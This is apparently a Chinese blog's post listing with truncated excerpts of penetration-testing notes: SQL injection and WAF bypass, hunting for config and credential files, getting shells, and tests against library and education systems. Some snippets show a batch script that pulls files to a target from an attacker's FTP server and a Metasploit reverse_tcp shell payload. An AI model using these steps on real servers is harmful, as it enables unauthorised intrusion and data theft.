原创 url編碼的一個小細節
0x00 前言 最近做***測試,大坑沒有,小坑不斷,都是細節出了問題才導致的錯誤發生,今天又遇到了一個小的問題,調試了一段時間才發現是編碼問題。。。。所以說細節決定成敗阿。。 0x01 問題 筆者在做安全檢測時遇到一處注入,SQL
2018-09-11 09:25:35
原创 win和linux下尋找關鍵文件命令
***過程中,當獲取到一定的服務器權限,爲驗證漏洞危害性或進一步***時,可能需要找一些敏感文件例如:php中的 config.php config.inc.php ...asp中的 xxx.mdbjsp中的 xxx.properties
2018-09-11 09:25:35
原创 一次差異備份拿shell過程
0x00 前言 掃描器掃到了某個網站存在目錄瀏覽,於是便有了本文。。。 知識點科普: 1. 目錄瀏覽 目錄瀏覽在我個人看來是危害較大的一個漏洞,該漏洞是指“在沒有默認文檔的目錄下,列出該目錄下所有文件名及文件信息”,如果站點存在這種錯誤
2018-09-11 09:25:35
2
原创 phpinfo信息泄漏
0x00 前言 phpinfo對於php程序員來說是熟悉不過的,但這個函數能列出服務器很多信息,稍有不慎就能給你服務器帶來危害,那麼這個函數究竟能泄漏什麼樣的信息呢? 0x01 1. 網站真實ip 當網站使用cdn或羣集時,那麼該文件會
2018-09-11 09:25:35
原创 MSSQL WAF繞過(2)
0x00 前言 上次的繞過太簡單,也沒有能注出數據或者獲取權限,這次繼續繞過,獲取數據 0x01 過程 還是上次的站點,簡單的判斷,存在注入 發現and 數字、exec、union select、 select 數字。。。被過濾 發現e
2018-09-11 09:25:35
2
原创 對某圖書館***一次筆記
0x00 前言 對某圖書館系統一次檢測 0x01 *** 訪問該網站時,發現自動跳轉到/opac/search.php,且下方有公司信息,可以判定該系統爲Libsys圖書管理系統,且版本爲4.5 2.通過烏雲鏡像站的搜索,我們發現該
2018-09-11 09:25:35
1
原创 分享一個ftp下載腳本
當你的目標是一臺windows服務器時,需要對方去下載一個文件可用到set name=ftp賬號 set password=ftp密碼 set ip=外網ip set warName=需下載文件名稱 @echo offecho open
2018-09-11 09:25:35
原创 msf shell筆記
metasploit幾種shellcode類型 可直接用nc接收的shelluse payload/windows/x64/shell/reverse_tcp #win64 使用tcp反彈的shellcodeset lhost i
2018-09-11 09:25:35
原创 python requests自定義方法
今天改造一個iis6 put上傳漏洞的一個腳本,以前使用http.client完成,但個人覺得有一些麻煩,就想用第三方庫requests來實現,卻發現requests中並沒有move方法查了一下,發現requests.requests可以自
2018-09-11 09:25:34
原创 對某教育系統一次檢測筆記
記錄正方教育系統一次檢測過程 參考文章地址:http://wooyun.jozxing.cc/static/bugs/wooyun-2015-0122523.html 本次檢測的目標中存在其中提到的一處注入BMCheckPassword,參
2018-09-11 09:25:33
1